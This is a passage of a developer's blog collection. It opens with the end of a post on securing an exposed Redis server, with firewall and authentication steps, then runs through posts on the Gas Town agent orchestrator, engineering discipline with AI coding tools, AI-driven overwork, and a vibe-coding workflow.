  cmd: redis-server --appendonly yes --requirepass <32-char-password>

Then ufw deny 6379/tcp, block the attacker IPs, delete the malicious keys. Sentry goes quiet. Movie resumes.

Twenty minutes to fix. Thirty seconds to have prevented.

The Pattern I Keep Seeing

Here’s what gets me. Last month it was a client — Next.js RCE, CVSS 10, dependency they forgot to update. This month it’s me — a port mapping I forgot to question.

Neither attack was sophisticated. Both exploited the gap between “it works” and “it’s secure.” The gap that widens every time you’re shipping fast, solo, with three other things on your plate.

When you’re the entire engineering team, you’re also the entire security team. There’s no infra review. No SOC watching at 10 PM. It’s you, your monitoring, and whatever defaults you didn’t question.

I’ve been doing infrastructure for twenty years, and I still shipped an unauthenticated Redis to production. Because the config worked and I had features to build.

This Is Why I’m Building VMKit

Every time I deploy something to a VPS, I’m making fifty decisions that could go wrong. Port mappings. Firewall rules. Authentication. TLS. Container networking. Every one of them is a potential Saturday night incident.

VMKit is my answer to this. Railway-like deployment experience on your own infrastructure — but with sane defaults baked in. No exposed ports unless you explicitly ask for them. Internal networking by default. The kind of guardrails that would have prevented this entire post from existing.

Because solo devs shouldn’t have to be security experts to deploy a Redis instance. The tooling should handle the boring, critical stuff so you can focus on the features that actually make money.

I’m building it because I keep shooting myself in the foot, and I’m tired of the limp.

Your Five-Minute Audit

If you’re running Redis, PostgreSQL, MongoDB, or Elasticsearch on a VPS right now:

docker compose config | grep -i port — anything bound to 0.0.0.0? Kill it unless it needs public access.
Add authentication to everything. Redis doesn’t require a password by default. This is unhinged, but here we are.
Set up Sentry or equivalent. Without error monitoring, I’d have a cryptominer running and a confused electricity bill.
ufw status. If the output surprises you, that’s your sign.
Default deny. Allow only 22, 80, 443. Everything else is closed until you need it.

The attacker didn’t use a zero-day. They used Shodan, an open port, and my negligence. That’s the most common attack vector for solo-deployed SaaS, and it’s entirely preventable.

Don’t be me on a Saturday night. Five minutes. Audit your configs.

Your future self — and your wife — will thank you.

What Happens When You Let 6 AI Agents Write Code at the Same Time

Lakshmi Narasimhan — Thu, 29 Jan 2026 10:12:10 GMT

Steve Yegge released Gas Town on January 1st, 2026. An agent orchestrator for Claude Code. Multiple AI agents working in parallel, coordinated through git-backed task tracking, communicating via an internal mail system. The pitch: stop babysitting one Claude session. Run twenty.

His first rule: don’t use this in its first weeks.

I used it in its first week.

Hey, I’m Lakshmi — I help developers build, deploy, and distribute their SaaS without hiring a team. I also run Stacksweller and Supabyoi.

New here? Start with Why Your AI Wakes Up Every Morning With No Memory or Clean Code Is Dead.

Subscribe now

Why I Couldn’t Wait

I work across four projects solo. SaaS products, open source tools, content — the usual indie dev plate-spinning. Every Claude Code session I run is one session I’m not running somewhere else. The promise of parallel agents shipping code while I context-switch between projects was too compelling to resist.

So I installed Gas Town, added my projects as “rigs,” groomed six tasks into “beads,” and spawned six workers simultaneously.

My M2 MacBook responded by becoming a space heater that couldn’t render a terminal.

What Gas Town Actually Is

Before I explain what went wrong, let me translate the concepts. Gas Town uses Mad Max-inspired naming, which is either charming or maddening depending on your patience.

Town — Your workspace root (~/gt/). Think of it as the factory floor where everything lives.

Rig — A project container. Each of your repos becomes a rig inside the town. Not a git clone itself, but a wrapper that manages clones, worktrees, and workers for that project.

Beads — A git-backed issue tracker, also built by Steve. Every task, bug, or feature is a “bead” with a unique ID like supabyoi-9ue. They live in your repo’s .beads/ directory, committed alongside your code. Dependencies between beads create a task graph. I wrote about why this matters — AI agents lose all context when sessions end. Beads solve this by making work persist in git. This is the piece that genuinely works well.

Mayor — The global coordinator agent. You talk to the mayor, the mayor dispatches work. It sits above all rigs and orchestrates across projects.

Polecat — An ephemeral worker agent. Gets spawned with a task, works in its own git worktree, signals completion, gets cleaned up. The grunt labor.

Witness — Per-rig monitor that watches polecats. Detects stuck workers, nudges them, handles cleanup.

Deacon — Town-level watchdog that patrols all rigs. Monitors witnesses, refineries, everything.

Refinery — Per-rig merge queue processor. When a polecat finishes, the refinery handles the PR/merge workflow.

Convoy — Batch tracker for related work. Group six beads into a convoy, dispatch them, track progress as a unit.

Molecules — Reusable workflow templates. Formula defines the pattern, molecule is the running instance.

That’s ten concepts before you write a line of code. Steve’s mental model is a steam engine: agents are pistons, work flows through hooks, everything runs on the “Propulsion Principle” — if you find work on your hook, you execute immediately.

The architecture borrows from Erlang’s supervisor trees(I think) — a pattern from telecom systems where processes are organized in a hierarchy. Each parent monitors its children: if a child crashes, the parent restarts it. In Gas Town, the Deacon watches Witnesses, Witnesses watch Polecats, and failures cascade upward. This is a proven pattern that runs phone switches serving millions of calls. The catch: Erlang processes are lightweight (microseconds to spawn, kilobytes of memory). Claude Code sessions are heavy (seconds to spawn, gigabytes of memory). When each “process” is a full AI session burning tokens, the economics of cheap failure recovery invert.

What Actually Happened

Week One: The Learning Curve

The first session was pure orientation. I needed Claude to explain Gas Town to me while inside Gas Town. The cognitive overhead of mapping “polecat” to “worker” and “rig” to “project” consumed real mental energy that should have gone to actual work.

The 80/20 path is supposed to be:

gt up          # Boot everything
gt mayor attach  # Talk to the mayor

In practice, gt up failed because the bd (beads daemon) version check timed out. This led me down a rabbit hole patching the version comparison in Go — changing time.Equal() to time.Unix() because JSON serialization was losing nanosecond precision. I was debugging the orchestrator instead of using it.

Week Two: Six Polecats and a Space Heater

Once things stabilized, I got ambitious. Six beads groomed, six polecats spawned:

gt sling supabyoi-9ue supabyoi
gt sling supabyoi-abc supabyoi
# ... four more

Each polecat is a full Claude Code session in its own tmux pane with its own git worktree. Six of those plus a mayor, witnesses, refineries, deacons, and multiple bd daemons meant my M2 was running 20+ processes competing for resources.

The system didn’t crash. It degraded. Commands took minutes to respond. Shell execution broke mid-session. I had to kill processes manually and nuke the setup.

But here’s the thing — that wasn’t entirely Gas Town’s fault. Six concurrent Claude sessions will hammer any laptop. The real issue was that Gas Town spawned orphaned daemon processes that accumulated across restarts. I found six bd daemons running simultaneously, plus stuck bd mol burn processes from days ago that never cleaned up.

The Doctor Loop

Gas Town has a gt doctor command — a health check that reports errors and warnings. I ran it constantly.

First run: 1 error, 11 warnings. After gt doctor --fix: 4 fixed, 7 remaining. After restart: new errors. After bd daemon restart: timeout errors. After updating bd from v0.47.0 to v0.47.2: different errors.

Each fix revealed the next problem. The mayor’s CLAUDE.md was 280 lines (should be under 30). Environment variables from dead sessions broke prefix routing. Beads databases pointed to wrong paths. Symlinks needed codesigning to avoid macOS killing the binary.

It felt less like using a tool and more like being a system administrator for a tool.

What Genuinely Works

Beads: The git-backed issue tracker is solid. Creating tasks, tracking dependencies, finding ready work — this layer does its job. It survived every crash and restart because it’s just files in git. Steve built Beads as a standalone tool before Gas Town, and it’s the strongest foundation in the stack.

Worktree isolation: Each worker gets its own git worktree. No merge conflicts between parallel work. Clean separation. This is the right primitive.

The hub/worker model: Having a coordinator dispatch tasks to isolated workers is correct. The mental model of “groom beads, dispatch to workers, merge results” is sound.

gt doctor: Despite the loop, having a comprehensive health check that can auto-fix common issues is genuinely useful infrastructure.

What Doesn’t Work Yet

Daemon management: Orphaned processes are the #1 pain. bd daemons accumulate, stuck processes never clean up, version checks timeout. This is being fixed — v0.5.0 added process group killing — but it was brutal in weeks one and two.

The naming: I’m not trying to be uncharitable. But “polecat” adds zero information over “worker.” “Molecule” adds confusion over “workflow.” Every conversation about Gas Town requires a glossary. When a Hacker News commenter pointed out the irony — Steve Yegge wrote “Execution in the Kingdom of Nouns” mocking over-abstraction — it stung because it’s accurate.

Human as dispatcher: This is the core limitation. Despite all the automation, the mayor waits for you. Issue #694 on GitHub tracks exactly this: “Mayor lacks automated dispatch patrol molecule.” Community members built external cron scripts to poke the system. That tells you everything.

Cost and resource usage: Multiple reports of $100/hour token burn rates. DoltHub’s field test found none of the PRs were good enough to merge. The economics only work if the agents produce mergeable code reliably.

What I’m Building Instead

Gas Town taught me what I need. It also taught me what I don’t.

I wrote about why I’m building my own agent orchestrator. It’s called wt. The core idea: keep the infrastructure that works (beads, worktrees, tmux), strip the ceremony that doesn’t (polecats, molecules, deacons, refineries).

Where Gas Town has ten concepts, wt has three: hub, worker, task. That’s it.

The hub coordinates. Workers execute in isolated worktrees. Tasks are beads with dependencies. No mail system, no witness layer, no convoy abstraction. If a worker finishes, the hub sees it in the dashboard. If a worker gets stuck, you look at the terminal. No intermediate monitoring agent needed.

The key difference: wt is a pluggable orchestrator. Each project gets its own config — yolo mode for prototypes (no tests, auto-merge, maximum speed), strict mode for production code (tests required, PR review, quality gates), or anything in between. Gas Town is one-size-fits-all. Real projects aren’t.

It’s early. But two weeks of wrestling Gas Town gave me the blueprint for what comes next.

What I’m Taking Away

Gas Town is a research prototype that got released into the wild. Steve warned people. I didn’t listen.

But I don’t regret it. Two weeks of wrestling gave me clarity about what agent orchestration actually needs:

Beads (or equivalent) is non-negotiable. Git-backed task tracking with dependencies is the foundation. Without it, agents have no memory across sessions.
Worktree isolation is the right primitive. One agent, one worktree, no conflicts. Simple and correct.
The hub/worker model works — if the hub is smart. The dispatcher problem is the real unsolved challenge. Manual dispatch defeats the purpose.
Simplicity beats power. Three concepts (hub, worker, task) cover 90% of the use cases. Ten concepts with Mad Max names cover 95% but cost you 5x the cognitive overhead.
Your laptop has limits. Two to three concurrent workers is practical on a MacBook. Six is aspirational. Twenty is a data center problem.

Steve Yegge is doing genuinely new work here. Nobody else has shipped a multi-agent orchestrator for Claude Code with this level of ambition. The HN comment that stuck with me: “Gas Town is cackling mad laughter from someone both insane and prescient simultaneously. Today it’s insane. But expect serious versions in the future informed by these early experiments.”

I broke the first rule. I’d do it again. Just maybe with fewer polecats next time.

Software Engineering Is Dead, or Is It?

Lakshmi Narasimhan — Tue, 27 Jan 2026 15:32:16 GMT

Everyone said agentic coding would kill software engineering discipline. Turns out it killed the wrong disciplines.

Hey, I’m Lakshmi — I help developers build, deploy, and distribute their SaaS without hiring a team. I also run Stacksweller and Supabyoi.

New here? Start with Why Your AI Wakes Up Every Morning With No Memory or Clean Code Is Dead.

Subscribe now

Clean code? Dead. Nobody’s hand-crafting variable names when Claude generates 500 lines in 30 seconds. But TDD, specs-driven development, domain-driven design — the stuff we used to skip because it felt like ceremony? That’s the load-bearing wall now. Tear it out and the whole thing collapses.

TDD: The Cache That Wasn’t

I had Claude Code build me a Redis caching module. Proper TTLs. Cache invalidation on writes. Unit tests passing. Beautiful, elegant, chef’s-kiss code.

One problem. The actual query functions never called the caching layer.

Hundreds of requests later, I checked Redis. Empty. A pristine, untouched Redis instance, sitting there like a museum exhibit. I’ve written about these failure patterns before — this one hurt the most.

Integration tests would have caught it. But only if I’d written them first. That’s the part everyone skips — writing the verification before the implementation. TDD forces you to define “done” before the agent starts building. Without it, you get beautiful isolated components that nobody wired together.

This isn’t hypothetical. An r/programming thread (894 upvotes) nailed it: “We’re getting correct code, but not right code.” One reviewer found AI-generated Java using the default ForkJoinPool for I/O-bound tasks. Compiles fine. Passes unit tests. Catastrophic under load.

My favorite was the “chief architect” who generated “full coverage” unit tests with Copilot. Duplicate asserts. Unused service constructions. Tests that passed but tested nothing. A green CI pipeline that was essentially a participation trophy.

TDD isn’t ceremony anymore. It’s the spec your agent actually follows.

Specs-Driven Development: The Authentication Amnesia

I spent two weeks pair-programming authentication with Claude Code. We tracked race conditions together. Debated RS256 vs HS256. Built a shared understanding of every edge case.

Then compaction hit.

“Where did we leave off?”

“I don’t have information about previous sessions.”

Two weeks of context. Gone. My TODO.md became a graveyard of cryptic notes that made sense to exactly nobody, including me three days later. I wrote the full horror story here.

So I started using a git-backed issue tracker with dependency graphs that persists across agent sessions. Sprints and epics stopped being PM ceremony and became the agent’s memory. The control plane for multi-session work.

The pattern scales beyond my personal disasters. An r/programming post titled “The era of AI slop cleanup has begun” (4,200 upvotes) described a freelancer who keeps getting hired to fix AI-generated codebases. “It mostly works, but does so terribly.” The missing ingredient every single time: no structured planning, no phased delivery. Just vibes and a prompt.

Fred Brooks said it decades ago, and r/ExperiencedDevs rediscovered it (1,400 upvotes): “Once requirements are fully expressed, their information content is fixed. You can change surface syntax, but you can’t compress semantics.”

You can’t skip the thinking. You can only skip writing it down — and then you pay for it later when your agent wakes up with amnesia.

DDD: The Firewall Agents Can’t Generate

Here’s a Reddit thread that lives in my head rent-free. Someone described the “Phantom Author” problem — only domain experts catch the subtle flaws agents produce. The code compiles. The tests pass. The logic is plausible. But it’s wrong in ways only someone who understands the domain would notice.

The punchline: “Ironically the only people who should be using AI are people who are already experts.”

Bounded contexts — the core DDD concept — are the firewall. They tell the agent where one domain ends and another begins. Without that modeling, agents connect everything to everything. Your billing module knows about your notification preferences. Your auth layer has opinions about your recommendation engine.

Agents can’t generate domain boundaries because domain boundaries come from understanding the business, not the code. That’s your job. The agent’s job is everything inside the boundary.

The Punchline

The disciplines that survived aren’t the ones that made code pretty. They’re the ones that tame complexity.

TDD tells the agent what “done” means. Specs give it memory across sessions. DDD gives it boundaries it can’t infer on its own.

We didn’t need less engineering discipline. We needed different engineering discipline. The ceremony is dead. The structure is mandatory.

The AI Productivity Paradox: Why I'm Working More Than Ever

Lakshmi Narasimhan — Mon, 26 Jan 2026 08:32:29 GMT

I had a conversation with a friend last week that I can’t stop thinking about.

Hey, I’m Lakshmi — I help developers build, deploy, and distribute their SaaS without hiring a team. I also run Stacksweller and Supabyoi.

New here? Start with Why Your AI Wakes Up Every Morning With No Memory or Clean Code Is Dead.

Subscribe now

We were comparing notes on hitting usage limits with AI coding tools. Both of us on expensive plans. Both of us running into ceilings more often than we did months ago. Both of us, apparently, turning into “power users” in our respective tiers.

And then he dropped this line: “So AI was supposed to make us work less but now we are working more. That’s the conclusion.”

I laughed. Then I stopped laughing.

Because he’s right. I get more done in a single day than I used to accomplish in a week. I’m shipping features, writing content, running experiments at a pace that would’ve been unthinkable about a year ago.

And I have never worked this much in my life.

Here’s what nobody warned us about: AI didn’t give us more time. It gave us more capability.

And capability, it turns out, is extremely addictive.

The Collapse of Activation Energy

Before AI coding assistants, most ideas died a quiet death in my notes app. Not because they were bad ideas. Because the effort-to-value ratio was unfavorable.

“I could build that feature, but it would take a week of focused work. Is it worth a week? Probably not.”

Idea archived. Moving on.

Now that same feature takes a day. Sometimes less. So I build it.

Then I build the next thing. And the next. And suddenly I’m shipping more in a month than I used to ship in a quarter.

The activation energy for starting new work collapsed. And I filled every inch of the newly available space.

Ambition Scales With Output

Here’s the thing about humans: we don’t scope our ambitions in absolute terms. We scope them relative to what feels achievable.

Before AI, I planned projects based on what I could reasonably ship with my limited time and energy. A feature per week. Maybe two if I was focused.

Now “reasonable” means something entirely different. My mental model of what’s achievable expanded by 5x, and my project scope expanded right along with it.

I’m not doing the same work faster. I’m doing more work.

The goalposts moved. And I moved them myself.

The Death of Natural Stopping Points

There used to be friction in development work. Waiting for builds. Context switching costs. The mental load of holding an entire system in your head while debugging.

That friction was annoying. It was also a circuit breaker.

It forced breaks. It created natural pauses where you’d step away, get coffee, maybe realize it was 7pm and you should probably eat dinner.

AI removed the friction. Which sounds great until you realize the friction was also your automatic brake pedal.

Now you can go from idea to implementation to deployment without ever hitting a natural stopping point. The only thing that stops you is your own willpower.

My willpower, for the record, is not great.

The Dopamine Loop of Shipping

Here’s an uncomfortable comparison: AI-assisted coding feels a lot like infinite scroll.

You ship something. It feels good. The tool makes shipping fast and easy. So you ship something else. That also feels good. And there’s always one more thing you could ship.

Same psychological mechanics. Different output.

Except instead of consuming content, you’re producing it. Which feels more virtuous. Which makes it even harder to stop.

“I’m not doomscrolling. I’m being productive.”

Sure you are.

The “Why Not” Threshold

The most insidious change is what happened to my internal cost-benefit calculator.

I used to ask: “Is this worth the effort?”

Now I ask: “Why wouldn’t I just do this?”

That experiment I would’ve skipped because setting it up was tedious? Now I run it. That edge case I would’ve ignored because fixing it properly would take half a day? Now I fix it.

The threshold for “worth my time” dropped to near zero. So everything is worth my time. So I do everything.

This is how you end up working 12-hour days while technically being more “efficient” than ever before.

The Uncomfortable Truth

AI tools didn’t give us more free time. They gave us more output capacity. And we’re psychologically incapable of leaving capacity unused. At least I am.

The work expanded to fill the available capability. Parkinson’s Law, but in reverse.

We’re not working less. We’re shipping more while feeling productive. Which is a different thing entirely.

My friend was right to put “off” in scare quotes when wishing me a good weekend. We both knew I wasn’t really taking time off. I was just switching to a different kind of work.

What Now?

I don’t have a tidy solution here. I’m not going to pretend I’ve figured out work-life balance in the age of AI assistants.

But I’ve started noticing when I’m filling capacity just because I can. When I’m starting a new feature not because it matters, but because the activation energy is so low that “why not” won the argument.

Sometimes the answer to “why not” is: because you could just... not.

Groundbreaking insight, I realize.

The AI isn’t going to set boundaries for you. If anything, hitting usage limits might be the only forced break some of us get. Which is both sad and a little funny.

Maybe the real productivity hack is learning to leave capability on the table.

I’ll let you know how that goes. Right after I ship this one more thing.

I write about building and deploying software as a solo developer. If you’re trying to do it all yourself without hiring a team, I’m probably making the same mistakes you are.

I Built 2 SaaS Products Vibe Coding. Here's the System That Made It Work.

Lakshmi Narasimhan — Sat, 24 Jan 2026 14:06:41 GMT

Gene Kim and Steve Yegge’s Vibe Coding book says you’re the head chef now.

The metaphor runs through the whole thing: you’re not a line cook anymore, you’re orchestrating AI sous chefs, directing the kitchen, tasting every dish before it goes out. The developer-as-implementer era is over. Welcome to developer-as-orchestrator.

Hey, I’m Lakshmi — I help developers build, deploy, and distribute their SaaS without hiring a team. I also run Stacksweller and Supabyoi.

New here? Start with Why Your AI Wakes Up Every Morning With No Memory or Clean Code Is Dead.

Subscribe now

The Biryani Incident

It’s a good metaphor. I buy it. But here’s the thing about being a head chef that the metaphor doesn’t quite capture: a head chef without mise en place is just a guy having a panic attack near hot surfaces.

I know this because I’ve been that guy. Literally.

My wife had to leave town for a few days. “I’ll handle dinner,” I said, with the confidence of someone who has watched many cooking videos and successfully boiled pasta multiple times. I decided to make veg biryani — a dish my wife makes effortlessly, layering rice and vegetables and spices into something that tastes like it required more effort than it actually did.

“Prep everything first,” she told me before leaving. “Soak the basmati rice. Marinate the paneer. Chop the vegetables for layering. Have it all ready before you start cooking.”

Reader, I did not do this.

I started frying onions. While the onions were going, I realized I hadn’t marinated the paneer. So I started cubing paneer and mixing yogurt and spices. Then the onions started burning. I ran back, stirred frantically, ran back to the paneer. Remembered I needed to soak the basmati. Started the rice soaking. The onions were now definitely burned. I scraped them out, started over, but now I was behind, so I tried to do the vegetables and the new onions simultaneously while the paneer sat half-marinated...

An hour later I had a kitchen that looked like a crime scene, three pans with various stages of failure in them, and something that was technically edible but bore no resemblance to biryani. My wife, via video call, watched me plate this disaster with the expression of someone who had specifically warned against this exact outcome.

The problem wasn’t skill. I can cook. The problem was that prep and execution were bleeding into each other. I was trying to figure out what I needed while also doing the thing. And it turns out you can’t actually do both. Not well, anyway.

I’ve been that guy with AI sous chefs too.

I’ve been vibe coding since mid-2025. By “vibe coding” I mean the thing where you describe what you want in natural language and an AI writes the code. You know, the future we were promised, except the future has some sharp edges nobody mentioned in the demos.

Two SaaS products. Real users. Real revenue. Not toy projects, not “look ma I generated a todo app” tutorials, not the kind of thing you show off on Twitter and then quietly delete three weeks later. Actual products that people pay actual money for.

So when I tell you what follows, understand: this isn’t theory. This is what I learned by shipping real things and watching everything that could go wrong go wrong.

The Markdown Hemorrhage

For the first few months, I was that chef.

I’d sit down to implement a feature. Claude and I would get rolling. Then I’d notice a bug. Well, I’m already here, might as well fix the bug. Then while fixing the bug, I’d realize the error handling was inconsistent. Better clean that up. Oh, and there’s still context left in the window — might as well tackle that other feature I’ve been meaning to add.

Two hours later: three half-finished things, Claude confused about which task we’re actually doing, and code quality somewhere between “works” and “I’m not sure why.”

And the markdown. God, the markdown.

Claude, bless its heart, wanted to help me remember things. So it started creating files. ARCHITECTURE.md. DECISIONS.md. IMPLEMENTATION_NOTES.md. TODO.md. CONTEXT.md. CHANGELOG.md. README_UPDATED.md.

I call this markdown hemorrhage. The AI equivalent of a kitchen where every surface is covered with prep bowls, half-chopped vegetables, and sticky notes that say “DON’T FORGET THE SAUCE” — technically documentation, practically chaos.

At one point I had so many markdown files that I needed another AI tool just to search through the documentation I’d created for my AI tool.

This was clearly insane.

But here’s the thing that took me embarrassingly long to figure out: the problem wasn’t the tools. The problem was me.

One Goal Per Session

I was treating every Claude session like a buffet.

You know how it goes. You sit down to implement a feature. While you’re implementing, you notice a bug. Well, you’re already here, might as well fix the bug. Oh, and while fixing the bug, you realize the error handling is inconsistent across the codebase. Better clean that up too. And hey, there’s still context left in the window — might as well tackle that other feature you’ve been meaning to add.

Two hours later, you’ve got three half-finished things, Claude is confused about which task it’s actually working on, and the code quality has degraded to “works but I’m not sure why.”

I call this context pollution. And once I named it, I started seeing it everywhere.

LLMs are bad at juggling multiple goals. This isn’t a Claude problem — it’s a fundamental thing about how these models work. When you ask them to hold multiple objectives simultaneously, they get worse at all of them. Not a little worse. Dramatically worse.

The fix sounds almost stupidly simple: one goal per session.

That’s it. That’s the whole trick. One goal. One session. If you discover a bug while implementing a feature, you write down the bug and you close the session. The bug gets its own session later. No “while I’m here” detours. No context pollution.

“But what about efficiency?” I hear you asking. “Isn’t it wasteful to end a session when there’s still context left?”

This is the trap. This is exactly the thinking that leads to burned onions and half-marinated paneer. The leftover context is not an asset. It’s a liability. It’s your coworker with three tasks open, doing all of them poorly, about to forget everything anyway.

End the session. Start fresh. One goal.

The Mise en Place

Now, this discipline only works if you have a way to track what you’re not doing.

If you end a session every time you discover a bug, you need somewhere for that bug to live. Otherwise you’ll forget it. The bugs pile up in your head, you context-switch mentally, and you’re back where you started.

This is where beads comes in.

Beads is a git-backed issue tracker that Claude can read and write. Steve Yegge built it (yes, that Steve Yegge — the guy who wrote the platforms rant and approximately nine million words about Emacs). The idea is simple: every task becomes a “bead.” Claude creates them, updates them, closes them. They survive compaction. They sync through git.

I installed it. I ran bd init. And then something clicked.

See, beads isn’t just a todo list. It’s a forcing function. When you start a session, you run bd ready and it shows you what’s available to work on. You pick one. Not three. One.

And when you discover a bug mid-session? You tell Claude to create a bead for it. Claude writes it down, logs the context, notes any relevant details. Then you move on. The bug exists now. It has a home. You don’t have to hold it in your head.

The discipline and the tool reinforce each other. One bead per session only works because beads exist to capture everything else. And beads only work because the discipline prevents you from drowning in them.

Grooming vs. Coding

But I’m getting ahead of myself. Let me tell you about grooming.

In my old workflow, I’d sit down and just... start. Open Claude, describe what I wanted, begin coding. Very vibe. Very chaotic. Whatever felt right in the moment.

The problem is that “figuring out what to do” and “doing the thing” are completely different cognitive modes. One is divergent — you’re exploring possibilities, breaking down problems, identifying edge cases. The other is convergent — you’re executing, making decisions, writing code.

When you mix them, you get mush.

So now I run two types of sessions:

Grooming sessions are for thinking. I’m not coding. I’m not even planning to code in this session. I’m creating beads. Breaking down a feature into pieces. Identifying dependencies. Noting edge cases. If I think of an unrelated feature while grooming, it gets written down — for a different grooming session. No cross-contamination.

Coding sessions are for execution. One bead. Implement it. If I discover a bug, I note it and keep going unless it’s blocking. The bug gets groomed and coded in its own sessions later.

This separation is the whole game. It sounds bureaucratic. It sounds like exactly the kind of process that “vibe coding” was supposed to eliminate. But here’s the secret: this discipline is what makes vibe coding actually work at scale. Without it, you’re just generating code and hoping. With it, you’re building systems.

A Few Other Things

MCPs should be loaded at project level, not globally. Every MCP eats context. If a project doesn’t need the Reddit MCP, it doesn’t get the Reddit MCP. Context is expensive. Guard it like it’s money, because in a very real sense, it is.

Autocompact should be off. I want to control when context resets, not have the algorithm decide for me mid-feature. Yes, this means manually managing sessions. That’s the point.

Claude.md files are more powerful than you think. I have a global one in ~/.claude/CLAUDE.md with rules that apply everywhere. Each project gets its own with project-specific instructions. Claude reads these automatically. They’re like a pre-prompt that doesn’t eat your context window.

What Still Doesn’t Work

Now, here’s the part where I’m supposed to tell you it’s all solved and my workflow is perfect.

It’s not.

Debugging production issues is still clunky. I’ve got a combination of skills and MCPs that sort of works, but there’s too much manual context assembly. Something breaks in prod and I’m still spending the first 20 minutes of the session explaining the architecture before we can even start diagnosing.

Test-driven development doesn’t flow. The loop of “write test, see it fail, implement, see it pass” — it’s awkward. Claude wants to write everything at once. I’m still tweaking my tooling to make TDD feel natural.

UX work is hard. Like, fundamentally hard. Claude can scaffold UI. It can generate components. But “does this feel right?” is a human judgment call, and trying to get there through text-based iteration is like describing a painting to someone and asking them to tell you if it’s beautiful.

These are the walls I’m hitting. I’m building tooling to address them — an agent orchestrator that tailors Claude to my specific workflow. Work in progress. If you’re the adventurous type, you can try it now.

The System

So here’s the actual system, if you want to try it:

Install beads: npm install -g @anthropic-ai/beads && bd init
Add to your global CLAUDE.md: “Check bd ready at session start. One bead per session.”
Separate grooming from coding. Different sessions. Different mindsets.
Resist the urge to “do more while there’s context left.” That’s the trap.
Protect your context. Project-level MCPs only. Kill anything you don’t need.

Two SaaS products since mid-2025. All vibe coded with this system.

Not because the tools are magic. The tools are good, but tools are never magic. What made it work was the discipline — the willingness to be a little bit boring about context hygiene, to resist the temptation to do more, to trust that a focused session ships more than a scattered one.

Vibe coding without chaos. It turns out it’s not about vibing harder. It’s about vibing deliberately.

You’re the head chef now. But don’t forget your mise en place.

My wife was right, by the way. She usually is.

I’m Lakshmi. 20 years in software — ops, infrastructure, full-stack. Now solo founder using Claude Code to develop, deploy, and distribute.